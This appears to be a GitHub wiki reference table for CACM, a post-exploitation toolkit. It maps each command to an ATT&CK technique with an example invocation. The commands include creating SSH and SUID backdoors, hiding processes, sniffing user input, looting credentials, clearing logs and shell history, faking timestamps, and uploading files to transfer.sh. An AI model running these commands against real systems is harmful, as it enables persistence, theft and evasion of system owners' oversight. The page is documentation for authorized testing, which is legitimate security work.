-
Notifications
You must be signed in to change notification settings - Fork 112
CACM 工具速查表 CACM Tools Reference Table
RuoJi6 edited this page Aug 13, 2025
·
2 revisions
| 命令 Command |
中文功能 Chinese Function |
英文功能 English Function |
ATT&CK | 示例 Example |
|---|---|---|---|---|
dec |
使用AES-256-GCM解密文件或标准输入输出 | Decrypt file or stdin/stdout using AES-256-GCM | T1027 | dec secret.txt.enc |
xghostip |
使用不存在的IP地址进行网络操作 | Use a non-existing IP address (Ghost-IP) for network operations | T1090.003 | xghostip 10.0.0.1 target.com |
np |
支持中文的高级秘密扫描器 | Advanced secret scanner with Chinese support | T1552.001 | np /etc/ | less -R |
wfind |
查找可写目录 | Find writeable directories | T1083 | wfind --world-writable |
xlog |
从文件中删除包含指定模式的行或清理systemd日志 | Remove lines containing specified pattern from file or clear systemd journal | T1070.003 | xlog /var/log/auth.log "pattern" |
enc |
使用AES-256-GCM加密文件或标准输入输出 | Encrypt file or stdin/stdout using AES-256-GCM | T1027 | enc secret.txt |
sub |
查询crt.sh/ip-thc获取所有子域名 | Query crt.sh/ip-thc for all sub-domains | T1590.005 | sub example.com |
ws |
显示服务器基本信息 | WhatServer - display server's essentials | T1082 | ws -v -o info.txt |
bin |
下载有用的静态二进制文件 | Download useful static binaries | T1105 | bin nmap curl jq |
hide |
隐藏进程 | Hide a process | T1055 | hide 1234 |
notime |
在指定文件的mtime时间执行命令(需要root权限) | Execute a command at the 's mtime (requires root) | T1070.006 | notime /etc/passwd "touch file" |
scan |
带服务检测的高级端口扫描器 | Advanced port scanner with service detection | T1046 | scan 192.168.1.0/24 -p 22,80,443 |
xscp |
使用隐蔽功能静默传输文件 | Silently transfer files using SCP with stealth features | T1021.004 | xscp --stealth file.txt user@host:/tmp/ |
xsu |
切换用户并执行命令 | Switch user and execute commands | T1134.001 | xsu root "id" |
ctime |
将ctime设置为文件的mtime(需要root权限) | Set ctime to file's mtime (requires root) | T1070.006 | ctime /tmp/file |
dns |
将域名解析为IPv4 | Resolve domain name to IPv4 | T1590.005 | dns example.com MX |
lpe |
运行linPEAS/winPEAS进行权限提升检测 | Run linPEAS/winPEAS for privilege escalation detection | T1068 | lpe --fast |
xhome |
创建隐藏的临时HOME目录 | Create hidden temporary HOME directory | T1564.001 | xhome /tmp/.workspace |
transfer |
上传文件或目录到文件共享服务 | Upload a file or directory to file sharing service | T1041 | transfer file.txt --service transfer.sh |
xbounce |
将TCP流量转发到目标主机(TCP代理) | Forward TCP traffic to destination host (TCP proxy) | T1090.001 | xbounce :8080 target.com:80 |
xtmux |
隐藏的tmux会话(不会在'tmux list-sessions'中显示) | Hidden tmux sessions (won't show with 'tmux list-sessions') | T1564.001 | xtmux new -s hidden |
common |
常用命令集合(lt, ltr, lss, lssr, psg, lsg) | Common useful commands (lt, ltr, lss, lssr, psg, lsg) | T1083 | common lt /var/log |
dl |
使用curl/wget/python/perl/openssl或原生Go HTTP客户端请求URL | Request URL using one of curl/wget/python/perl/openssl or native Go HTTP client | T1071.001 | dl https://example.com/file.txt |
memexec |
在内存中启动二进制文件 | Start binary in memory | T1055 | memexec /usr/bin/id |
shred |
通过随机数据覆写安全删除文件 | Securely delete a file by overwriting with random data | T1070.004 | shred -u sensitive.txt |
tit |
嗅探/跟踪用户输入 - 监控进程读写系统调用 | Sniff/strace the User Input - Monitor process read/write system calls | T1056.001 | tit read 1234 |
xpty |
显示所有终端/已登录用户 | Show all terminals / logged in users | T1033 | xpty -v |
edr |
检测EDR/AV安全产品 | Detect EDR/AV security products | T1518.001 | edr --type av |
loot |
显示常见秘密和凭据 | Display common secrets and credentials | T1552.001 | loot --passwords |
find_subdomains |
在文件中搜索子域名 | Search files for sub-domain | T1083 | find_subdomains company.com |
hgrep |
搜索模式,人类可读输出 | Grep for pattern, output for humans | T1083 | hgrep password /etc/ |
notime_cp |
复制文件,保持birth-time、ctime、mtime和atime | Copy file. Keep birth-time, ctime, mtime & atime | T1070.006 | notime_cp source.txt dest.txt |
rdns |
从多个公共数据库进行反向DNS查询 | Reverse DNS from multiple public databases | T1590.005 | rdns 192.168.1.0/24 |
xssh |
使用隐蔽功能静默登录远程主机 | Silently log in to remote host with stealth features | T1021.004 | xssh user@host --stealth |
ssh_backdoor |
SSH后门用户权限维持 | SSH backdoor user persistence | T1136.001 | ssh_backdoor create backup_user |
suidshell |
创建SUID shell后门 | Create SUID shell backdoor | T1548.001 | suidshell create /tmp/.shell |
portmux |
端口复用 | Port multiplexing | T1090.001 | portmux setup 22 4444 |
sshmon |
SSH监控和数据传输 | SSH monitoring and data transmission | T1040 | sshmon start |
historydel |
删除历史命令记录 | Delete command history records | T1070.003 | historydel 100-200 |
- sub: 子域名发现 / Subdomain discovery
- ws: 系统信息收集 / System information collection
- scan: 端口扫描 / Port scanning
- dns: DNS查询 / DNS queries
- rdns: 反向DNS查询 / Reverse DNS queries
- xpty: 终端用户发现 / Terminal user discovery
- edr: 安全产品检测 / Security product detection
- wfind: 可写目录查找 / Writable directory discovery
- hgrep: 高级文本搜索 / Advanced text search
- find_subdomains: 文件中搜索子域名 / Subdomain file search
- enc: 文件加密 / File encryption
- dec: 文件解密 / File decryption
- shred: 安全删除 / Secure deletion
- np: 高级秘密扫描 / Advanced secret scanner
- loot: 凭据收集 / Credential collection
- dl: 多协议下载 / Multi-protocol download
- xbounce: TCP流量转发 / TCP traffic forwarding
- xghostip: 幽灵IP操作 / Ghost IP operations
- xssh: 隐蔽SSH连接 / Stealth SSH connection
- xscp: 隐蔽文件传输 / Stealth file transfer
- transfer: 文件上传服务 / File upload service
- hide: 进程隐藏 / Process hiding
- tit: 用户输入监控 / User input monitoring
- memexec: 内存执行 / Memory execution
- xsu: 用户切换 / User switching
- xhome: 隐藏工作目录 / Hidden working directory
- xtmux: 隐藏tmux会话 / Hidden tmux sessions
- bin: 工具下载 / Tool download
- lpe: 权限提升检测 / Privilege escalation detection
- ssh_backdoor: SSH后门用户 / SSH backdoor user
- suidshell: SUID shell后门 / SUID shell backdoor
- portmux: 端口复用 / Port multiplexing
- sshmon: SSH监控 / SSH monitoring
- notime: 时间戳伪装执行 / Timestamp disguised execution
- ctime: 修改创建时间 / Modify creation time
- notime_cp: 时间戳保持复制 / Timestamp preserving copy
- xlog: 日志清理 / Log cleaning
- historydel: 历史命令清理 / Command history cleanup
- common: 常用命令集合 / Common command collection
# 设置加密密钥 / Set encryption key
export HS_TOKEN="your_secret_key_here"
# 使用环境变量加密 / Use environment variable for encryption
echo "sensitive data" | enc
# 使用环境变量解密 / Use environment variable for decryption
cat encrypted_file.enc | dec# 设置CACM工作目录 / Set CACM working directory
export CACM_HOME="/tmp/.cacm_workspace"
# 工具会自动使用该目录存储临时文件 / Tool will automatically use this directory for temporary files- 仅限授权测试: 本工具仅用于授权的渗透测试和安全研究
- Authorized Testing Only: This tool is for authorized penetration testing and security research only
- 遵守法律法规: 请严格遵守当地法律法规,不得用于非法活动
- Comply with Laws: Strictly comply with local laws and regulations, do not use for illegal activities
- 获得明确授权: 使用前必须获得目标系统所有者的明确书面授权
- Obtain Clear Authorization: Must obtain clear written authorization from target system owners before use
某些功能需要root权限才能正常工作,包括: Some functions require root privileges to work properly, including:
-
notime,ctime,notime_cp- 时间戳操作 / Timestamp operations -
hide- 进程隐藏 / Process hiding - 部分系统级操作 / Some system-level operations
CACM (Come and catch me) - Advanced Penetration Testing Tool v1.0